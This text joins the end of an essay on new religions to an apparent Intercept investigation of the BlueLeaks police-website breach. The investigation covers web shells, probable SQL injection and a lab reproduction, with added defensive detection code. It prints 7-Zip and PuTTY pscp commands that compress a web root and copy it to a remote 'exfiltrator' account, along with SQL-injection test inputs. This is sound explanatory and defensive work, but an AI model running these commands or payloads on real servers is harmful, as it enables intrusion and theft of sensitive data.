Some branches of Jediism remain jokey, but others take themselves more seriously: the Temple of the Jedi Order claims its members are “real people that live or lived their lives according to the principles of Jediism” – inspired by the fiction, but based on the real-life philosophies that informed it.

With those sorts of numbers, Jediism “should” have been recognised as a religion in the UK. But officials who apparently assumed it was not a genuine census answer did not record it as such. “A lot is measured against the Western Anglophone tradition of religion,” says Singler. Scientology was barred from recognition as a religion for many years in the UK because it did not have a Supreme Being – something that could also be said of Buddhism.

In fact, recognition is a complex issue worldwide, particularly since there is no widely accepted definition of religion even in academic circles. Communist Vietnam, for example, is officially atheist and often cited as one of the world’s most irreligious countries – but sceptics say this is really because official surveys don’t capture the huge proportion of the population who practice folk religion. On the other hand, official recognition of Ásatrú, the Icelandic pagan faith, meant it was entitled to its share of a “faith tax”; as a result, it is building the country’s first pagan temple for nearly 1,000 years.

Skepticism about practitioners’ motives impedes many new movements from being recognized as genuine religions, whether by officialdom or by the public at large. But ultimately the question of sincerity is a red herring, Singler says: “Whenever someone tells you their worldview, you have to take them at face value”. The acid test, as true for neopagans as for transhumanists, is whether people make significant changes to their lives consistent with their stated faith.

And such changes are exactly what the founders of some new religious movements want. Official status is irrelevant if you can win thousands or even millions of followers to your cause.

Consider the “Witnesses of Climatology”, a fledgling “religion” invented to foster greater commitment to action on climate change. After a decade spent working on engineering solutions to climate change, its founder Olya Irzak came to the conclusion that the real problem lay not so much in finding technical solutions, but in winning social support for them. “What’s a multi-generational social construct that organises people around shared morals?” she asks. “The stickiest is religion.”

So three years ago, Irzak and some friends set about building one. They didn’t see any need to bring God into it – Irzak was brought up an atheist – but did start running regular “services”, including introductions, a sermon eulogising the awesomeness of nature and education on aspects of environmentalism. Periodically they include rituals, particularly at traditional holidays. At Reverse Christmas, the Witnesses plant a tree rather than cutting one down; on Glacier Memorial Day, they watch blocks of ice melt in the California sun.

As these examples suggest, Witnesses of Climatology has a parodic feel to it – light-heartedness helps novices get over any initial awkwardness – but Irzak’s underlying intent is quite serious.

“We hope people get real value from this and are encouraged to work on climate change,” she says, rather than despairing about the state of the world. The congregation numbers a few hundred, but Irzak, as a good engineer, is committed to testing out ways to grow that number. Among other things, she is considering a Sunday School to teach children ways of thinking about how complex systems work.

Recently, the Witnesses have been looking further afield, including to a ceremony conducted across the Middle East and central Asia just before the spring equinox: purification by throwing something unwanted into a fire – a written wish, or an actual object – and then jumping over it. Recast as an effort to rid the world of environmental ills, it proved a popular addition to the liturgy. This might have been expected, because it’s been practised for thousands of years as part of Nowruz, the Iranian New Year – whose origins lie in part with the Zoroastrians.

Transhumanism, Jediism, the Witnesses of Climatology and the myriad of other new religious movements may never amount to much. But perhaps the same could have been said for the small groups of believers who gathered around a sacred flame in ancient Iran, three millennia ago, and whose fledgling belief grew into one of the largest, most powerful and enduring religions the world has ever seen – and which is still inspiring people today.

Perhaps religions never do really die. Perhaps the religions that span the world today are less durable than we think. And perhaps the next great faith is just getting started.


Law enforcement websites hit by BlueLeaks may have been easy to hack

Some 270GB of police files were obtained, possibly in a single evening. Backdoor software might have had something to do with it.

August 19, 2020

by Micah Lee

The Intercept

Whoever broke into 251 law enforcement websites and obtained the BlueLeaks trove of documents appears to have reused decades-old software for opening “backdoors” in web servers.

The use of the widely available backdoors provides evidence that the hacktivist who compromised the sensitive sites, including fusion centers linked to federal agencies, didn’t need to use sophisticated digital attack methods because the sites were not very secure.

The backdoors appear among files in the roughly 270-gigabyte BlueLeaks dump but seem to originate not from law enforcement entities, like most of the documents, but from the hacker, who appears to have left behind a few tools in the leaked data. Other leaked files provide further clues about how the hacktivist operated.

Two of the files are a type of malware known as “web shells”: malicious files that, when placed on a server, provide an online entry point through which a hacker can download and upload files or issue commands of their choosing. These backdoors appear with BlueLeaks material obtained from the website of the Arizona High Intensity Drug Trafficking Area, which is basically Arizona’s fusion center for the drug war. One is called “ntdaddy.aspx” and the other is “blug.aspx.” Their presence has implications for all the affected sites, which were operated by the same company and appear to have run the same software.

Two other files appear to have aided the exfiltration of documents from the servers. The Arizona HIDTA files included a copy of a program for securely transferring files across the internet, which could have been used to move files onto a computer controlled by the hacker. Files for another site, ICEFISHX, Minnesota’s police fusion center, included a copy of a program for compressing files, which would make it much faster for the hacker to upload hundreds of gigabytes of data to their own computer.

All four of the files appear to be circumstantially linked to the hacker through their digital time stamps, which indicate they were created the evening of Saturday, June 6 — making them among the most recent data released in BlueLeaks. Basically, this time likely corresponds to the moments before the hacktivist exfiltrated the data for this leak.

The files do not provide any information about the identity of the hacker, how the hacker protected their anonymity, what infrastructure they used to exfiltrate data, or what vulnerability they exploited to initially hack these websites. But they do indicate that, instead of developing custom malware, the hacker pulled off-the-shelf software easily available to anyone online and that anti-virus software flags as malicious.

The BlueLeaks Data

The Arizona HIDTA and Minnesota ICEFISHX websites, as well as the rest of the hacked websites included in BlueLeaks, were built and hosted by the Texas web development firm Netsential. They all run the same web application, hosted on Microsoft’s Windows operating system; on Microsoft’s web server, Internet Information Services, or IIS; and on a Microsoft web programming framework, ASP.NET.

The web app’s data is also stored using Microsoft software, in a database system known as Access. For ICEFISHX, data lived in the file “icefishx.mdb” on its server. The database included information about 6,120 registered users, the content of 3,151 bulk emails that the fusion center sent out, as well as metadata about hundreds of documents. Arizona HIDTA’s data was in a file called “azhidta.mdb” and, among other things, included metadata describing thousands of items like laptops, furniture, and surveillance body wires in the HIDTA’s inventory.

BlueLeaks contains a separate folder for each hacked website. The files for the Arizona HIDTA website include what appears to be the original source code for the website, written in ASP.NET, along with the malicious web shells, “ntdaddy.aspx” and “blug.aspx,” as well as images, JavaScript files, and other files that make up the code of Netsential’s web app. It also includes all of the PDFs and Microsoft Office documents that were uploaded into the web app. While it does not directly include “azhidta.mdb,” the Access database, it does include references to the database, along with 220 spreadsheets, each one representing a table — that is, a collection of related, structured data — exported from the database. (This is true for most of the other hacked websites included in BlueLeaks, though some don’t contain all of the web app’s source code.)

According to historical domain name records, on July 17, almost a month after the hack was made public, Arizona HIDTA migrated their website away from Netsential’s Houston server and into the website hosting service Squarespace. ICEFISHX still uses Netsential’s web application. (Netsential stated on its website that it was not responding to requests for comment from the press. It did not respond to a message from The Intercept.)

SQL Injection

There is no legitimate reason for the “ntdaddy.aspx” and “blug.aspx” web shells to exist among Arizona HIDTA’s files — these were definitely traces left over from a hack — but it’s not clear exactly how they got onto the server to begin with. What was the initial attack vector used to compromise the server? I couldn’t find any direct evidence; there’s no mention of “ntdaddy” in log files, for example. But my best guess is that the hacker added the web shells using a type of web hacking called “SQL injection,” in which an attacker is able to modify the instructions sent to the database powering a website.

The Open Web Application Security Project, a nonprofit dedicated to improving the security of web software, puts injection attacks at the top of its list of security risks for web applications. SQL, short for Structured Query Language, is used by programmers to read and update many types of databases, including the Microsoft Access databases used by all of the hacked websites in the BlueLeaks dump. A SQL injection attack is when a hacker is able to “inject” their own SQL code inside a query, tricking the database into responding with different information or different actions than the website programmer intended. This is typically accomplished by visiting a maliciously devised web address or submitting specially crafted information into a web form and exploiting a flaw in how the website creates SQL queries to obtain particular information on behalf of particular users. On a badly configured web server, it would be possible (using the Access SQL query SELECT...INTO) for a hacker who has discovered a SQL injection vulnerability to create new files on the server and fill them with whatever information they want, such as code that makes up a web shell.

The best way to write software that isn’t vulnerable to SQL injection is to use a technique called prepared statements. Based on my analysis of the web app’s source code, Netsential’s web app (as it existed in the leaked files) does not use this technique. With prepared statements, the programmer narrowly determines ahead of time which part of a SQL query will change in response to the user and which part will always remain the same. Instead, the Arizona HIDTA’s website source code, as well as the code from the rest of the hacked websites in BlueLeaks, builds its SQL queries in an insecure way: only trying to mitigate SQL injection using a poorly implemented and error-prone technique known as “escaping,” which attempts to essentially neutralize malicious user input before using that input to build SQL queries. Another best practice is to use a “safe API” for interfacing with the database. Netsential’s web app doesn’t appear to do this either; every time it needs to interface with the database, the code executes a SQL query directly.

Because of this, it’s likely that Netsential’s web app has SQL injection vulnerabilities. To be clear, I haven’t discovered any myself. But given that the web app uses such bad security practices around SQL, and that I counted 1,931 places in the code where a SQL query gets executed, I think that it’s probable that mistakes were made in at least some of these places.

And, unless Netsential has fixed these potential vulnerabilities since the BlueLeaks data was made public and pushed updates to all of the websites still running its code, it’s likely that these law enforcement websites, including major police fusion centers in use today, are still vulnerable to SQL injection.
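The difference between escaping and prepared statements described above, shown as an added example that is not from the article or from Netsential's code. It uses Python's built-in sqlite3 module in place of ASP.NET and Access; the table, function names and inputs are constructed for illustration.

```python
import sqlite3


def make_db():
    """Build a small in-memory table standing in for a web app's user table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, agency TEXT)")
    db.executemany(
        "INSERT INTO users (id, name, agency) VALUES (?, ?, ?)",
        [(1, "alice", "north"), (2, "bob", "south"), (3, "o'neil", "east")],
    )
    return db


def escape(value):
    """The 'escaping' approach: double single quotes so input cannot close a string literal."""
    return value.replace("'", "''")


def lookup_by_name_escaped(db, name):
    # String context: the input sits between quotes, so quote-doubling holds here.
    sql = "SELECT id, name FROM users WHERE name = '" + escape(name) + "'"
    return db.execute(sql).fetchall()


def lookup_by_id_escaped(db, user_id):
    # Numeric context: the input is not wrapped in quotes, so there is nothing for
    # escape() to neutralize. The same helper that worked above silently fails here,
    # and the input is parsed as part of the SQL statement.
    sql = "SELECT id, name FROM users WHERE id = " + escape(user_id)
    return db.execute(sql).fetchall()


def lookup_by_id_prepared(db, user_id):
    # Prepared statement: the query text is fixed ahead of time and the input is
    # bound as a value. It is compared with the id column, never parsed as SQL.
    return db.execute("SELECT id, name FROM users WHERE id = ?", (user_id,)).fetchall()


def demo():
    """Run each lookup with ordinary and hostile input and return the row counts."""
    db = make_db()
    hostile_text = "x' OR '1'='1"   # constructed input for a string field
    hostile_number = "2 OR 1=1"     # constructed input for a numeric field
    return {
        "escaped string field, ordinary input": len(lookup_by_name_escaped(db, "o'neil")),
        "escaped string field, hostile input": len(lookup_by_name_escaped(db, hostile_text)),
        "escaped numeric field, hostile input": len(lookup_by_id_escaped(db, hostile_number)),
        "prepared numeric field, ordinary input": len(lookup_by_id_prepared(db, "2")),
        "prepared numeric field, hostile input": len(lookup_by_id_prepared(db, hostile_number)),
    }


if __name__ == "__main__":
    for case, rows in demo().items():
        print(f"{case}: {rows} row(s)")
```

Escaping depends on every one of a code base's query sites using the right rule for its context, which is why a large number of hand-built queries makes a mistake likely; the prepared form has no per-site rule to get wrong.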

Web Shells

I wanted to see what these web shells could do, so I set up a Windows virtual machine, installed an IIS web server, and copied both the ntdaddy.aspx and blug.aspx files from the Arizona HIDTA website into it. I also disabled the built-in Windows virus and threat protection; otherwise, Windows blocks both of these web shells from executing.

The “NTDaddy” web shell was first developed at least 18 years ago by a hacker named “obzerve” who worked with the hacker group fux0r inc. It’s widely available, including in this GitHub repository containing a collection of web malware. If you scan the ntdaddy.aspx file on VirusTotal, 36 out of 59 anti-virus programs flag it as malicious, generally classifying it as a web server backdoor.

But while testing out this web shell, I hit a problem. NTDaddy was coded in a language called classic ASP, Microsoft’s first server-side scripting language from 1996. Classic ASP files end in “.asp,” like ntdaddy.asp. In 2002, Microsoft released a more modern web application framework called ASP.NET, making classic ASP obsolete. ASP.NET files end in “.aspx,” like ntdaddy.aspx. Even though NTDaddy was coded in classic ASP, its filename on the Arizona HIDTA website used an ASP.NET filename: ntdaddy.aspx.

When I load ntdaddy.aspx in a browser, it responds with an error, which is to be expected because it’s trying to run classic ASP code as if it were ASP.NET code.

[Screenshot: NTDaddy error message when using .aspx file extension. Credit: Micah Lee]

It’s likely that the Arizona HIDTA’s IIS server wasn’t configured to execute classic ASP code at all, that this web shell simply didn’t work, and that the hacker didn’t bother deleting this file.

If I rename the file to ntdaddy.asp and load it in a browser, I can then explore the files on the server, upload new files, or issue commands.

The blug.aspx file contained a web shell simply called “ASPX Shell,” developed in 2007 by a hacker called “LT” — only the version on Arizona HIDTA’s website didn’t include the comment at the top of the file that gives LT credit, and lists the 2007 date.

Like NTDaddy, ASPX Shell is widely available and can be found in that GitHub repository. If you scan blug.aspx in VirusTotal, 15 out of 59 anti-virus programs flag it as malicious, generally classifying it as a web server backdoor.

But unlike NTDaddy, ASPX Shell works much better because it uses ASP.NET, not classic ASP (the malware itself was written in the C# programming language). It allows you to browse the file system, upload files, and run commands as if you were sitting in front of the Windows server with a command prompt open. Basically, it allows you to do anything that the IIS user on the Windows server has permission to do, including access all of the data related to the website.

However, when I try uploading a file to the folder where website files are stored (in my case, C:\inetpub\wwwdata), I get an unauthorized access error; perhaps my IIS server in Windows 10 Pro is more securely configured than Netsential’s servers. To more accurately replicate the Netsential servers, I reduced the permissions on that folder to allow my IIS user to save new files there.
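A defender can look for the same artifacts before any command is run. The following is an added example, not code from the article or from Netsential: it audits a web root for classic ASP source stored under an ASP.NET extension, for page code that references process execution, and for executable binaries kept in web content (such as the 7z.exe and pscp64.exe copies described in the next section). The regular expressions and the sample files are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Heuristics chosen for this example (assumptions to tune, not a full signature set).
CLASSIC_ASP = re.compile(rb"<%@\s*language\s*=", re.I)            # classic ASP directive
ASPNET_DIRECTIVE = re.compile(rb"<%@\s*(page|control|master)\b", re.I)
EXEC_HINTS = re.compile(rb"System\.Diagnostics\.Process|WScript\.Shell", re.I)
ASPNET_EXTS = {".aspx", ".ashx", ".ascx"}
SCRIPT_EXTS = ASPNET_EXTS | {".asp"}

def classify(name, data):
    """Return the findings for one file found under a web root."""
    findings = []
    ext = Path(name).suffix.lower()
    if data[:2] == b"MZ":  # DOS/PE header: a Windows executable or DLL
        findings.append("executable binary in web content")
    if ext in ASPNET_EXTS and CLASSIC_ASP.search(data) and not ASPNET_DIRECTIVE.search(data):
        findings.append("classic ASP source under an ASP.NET extension")
    if ext in SCRIPT_EXTS and EXEC_HINTS.search(data):
        findings.append("page code references process execution")
    return findings

def audit(root):
    """Walk a web root and return {relative path: findings} for flagged files."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file():
            with path.open("rb") as fh:
                found = classify(path.name, fh.read(1 << 20))  # first 1 MiB only
            if found:
                report[str(path.relative_to(root))] = found
    return report

# Constructed stand-ins for the kinds of files described above (not the real files).
SAMPLES = {
    "default.aspx": b'<%@ Page Language="C#" %>\n<html><body>Welcome</body></html>',
    "renamed.aspx": b'<%@ Language=VBScript %>\n<% Response.Write("hello") %>',
    "runner.aspx": b'<%@ Page Language="C#" %>\n'
                   b'<% var i = new System.Diagnostics.ProcessStartInfo(); %>',
    "7z.exe": b"MZ\x90\x00" + b"\x00" * 60,
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, classify(name, data))
```

A legitimate application may also reference process execution, so findings from this check are leads to review against the deployed code base rather than verdicts.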

Compression and Exfiltration

In addition to the web shells, two open-source Windows tools were included with the BlueLeaks files, both with June 6 time stamps:

ICEFISHX’s folder has a file called 7z.exe, a copy of the popular file compression and extraction program 7-Zip.

Arizona HIDTA’s folder has a file called pscp64.exe, a program that comes with PuTTY, a popular Windows tool for securely logging into and copying files to remote servers, typically those running the Linux operating system.

Using ASPX Shell, a hacker could run 7-Zip to compress all of the data they wished to exfiltrate, and then use PuTTY to copy it to a remote server controlled by the hacker.

So I decided to try this. In my first attempt at running 7z.exe, it gave me an error message saying that the file 7z.dll was missing. Possibly, the hacker uploaded this DLL file as well, but for whatever reason did not end up including it in the BlueLeaks data. So I downloaded a fresh copy of 7-Zip and grabbed the version of 7z.exe and 7z.dll from there. Then, I ran this command in my web shell:

7z.exe a police_data.7z c:\inetpub

This uses 7-Zip to create a new archive called police_data.7z, and it adds all of the files in the C:\inetpub folder to that archive.

ASPX Shell, compressing files with 7-Zip. Screenshot: Micah Lee

Now that I’ve created police_data.7z, I could just download the archive using my web browser. But instead I decided to try using PuTTY to exfiltrate the data to a remote server, which is what I’m guessing the BlueLeaks hacktivist did.

I created a new cloud server running Debian GNU/Linux with the IP address, and on that server I created a new user called “exfiltrator” with the password “89qzR2Y8KbFj”. Then, in ASPX Shell, (after a bit of troubleshooting) I ran this command:

pscp64.exe -batch -hostkey 05:d3:9a:ce:59:e6:28:e4:17:2c:da:69:22:53:04:14 -pw 89qzR2Y8KbFj police_data.7z exfiltrator@

This uses PuTTY’s secure copy (SCP) program to copy the police_data.7z file to my Debian server. The command includes the username, password, and IP address of my server. After running this command, a copy of the file was exfiltrated to my server. (I’ve already deleted that cloud server, in case you get any ideas.)

Hacking 251 Websites

To recap, here’s how I believe these websites were hacked:

The hacktivist found a SQL injection vulnerability, and then used it to create a web shell.

Using the web shell, they uploaded tools: 7-Zip and PuTTY.

They used 7-Zip to compress all of the data they wanted to exfiltrate.

They used PuTTY to copy this hacked data to a remote server they controlled.

To be clear, I’m not sure whether this is what the BlueLeaks hacker actually did. I have no inside knowledge; this is just my best guess based on the available evidence.

And because all of these websites run Netsential’s custom, insecure web app code, this process would likely be the same to hack any of them. In fact, it could even be automated to save time, allowing the hacker to compromise all 251 websites and exfiltrate all of the data from them in a single Saturday evening.
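The chain in this recap leaves a recognizable trail in process-creation logs: the IIS worker process (w3wp.exe) starts a command interpreter, which then starts an archiver and a file-transfer tool. The following is an added detection example, not code from the article. The event format is a simplified, hypothetical subset of the fields in a Sysmon process-creation record, the events are constructed, and it assumes the web shell runs commands through cmd.exe.

```python
import json
from pathlib import PureWindowsPath

# Constructed events in chronological order (not taken from the BlueLeaks data).
# 198.51.100.7 is a documentation-range address used as a placeholder.
SAMPLE_EVENTS = r"""
{"pid": 4100, "ppid": 812, "image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "cmd": "w3wp.exe -ap DefaultAppPool"}
{"pid": 4555, "ppid": 4100, "image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe", "cmd": "csc.exe /noconfig"}
{"pid": 5220, "ppid": 4100, "image": "C:\\Windows\\System32\\cmd.exe", "cmd": "cmd.exe /c 7z.exe a police_data.7z c:\\inetpub"}
{"pid": 5224, "ppid": 5220, "image": "C:\\inetpub\\wwwdata\\7z.exe", "cmd": "7z.exe a police_data.7z c:\\inetpub"}
{"pid": 5300, "ppid": 4100, "image": "C:\\Windows\\System32\\cmd.exe", "cmd": "cmd.exe /c pscp64.exe -batch police_data.7z exfiltrator@198.51.100.7:"}
{"pid": 5304, "ppid": 5300, "image": "C:\\inetpub\\wwwdata\\pscp64.exe", "cmd": "pscp64.exe -batch police_data.7z exfiltrator@198.51.100.7:"}
{"pid": 6000, "ppid": 3012, "image": "C:\\Windows\\System32\\notepad.exe", "cmd": "notepad.exe notes.txt"}
"""

IIS_WORKER = "w3wp.exe"
# ASP.NET compiles pages by launching these from w3wp.exe; tune this list per host.
EXPECTED_CHILDREN = {"csc.exe", "vbc.exe", "cvtres.exe"}
STAGING_TOOLS = {"7z.exe", "pscp.exe", "pscp64.exe"}  # archiver and SCP client

def detect(lines):
    """Flag processes descended from the IIS worker; return (severity, name, cmd)."""
    iis_tree = set()  # PIDs of w3wp.exe and its descendants (ignores PID reuse)
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        name = PureWindowsPath(ev["image"]).name.lower()
        if name == IIS_WORKER:
            iis_tree.add(ev["pid"])
            continue
        if ev["ppid"] not in iis_tree:
            continue  # not part of the web server's process tree
        iis_tree.add(ev["pid"])
        if name in EXPECTED_CHILDREN:
            continue
        severity = "high" if name in STAGING_TOOLS else "medium"
        alerts.append((severity, name, ev["cmd"]))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS.splitlines()):
        print(*alert, sep=" | ")
```

Tracking the whole process tree rather than only direct children is what catches 7z.exe and pscp64.exe here, since their immediate parent is cmd.exe and not w3wp.exe.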

For the record: I’m an adviser for DDoSecrets, the transparency collective that received the BlueLeaks data — from a source identifying with the hacktivist collective Anonymous — and then published it.














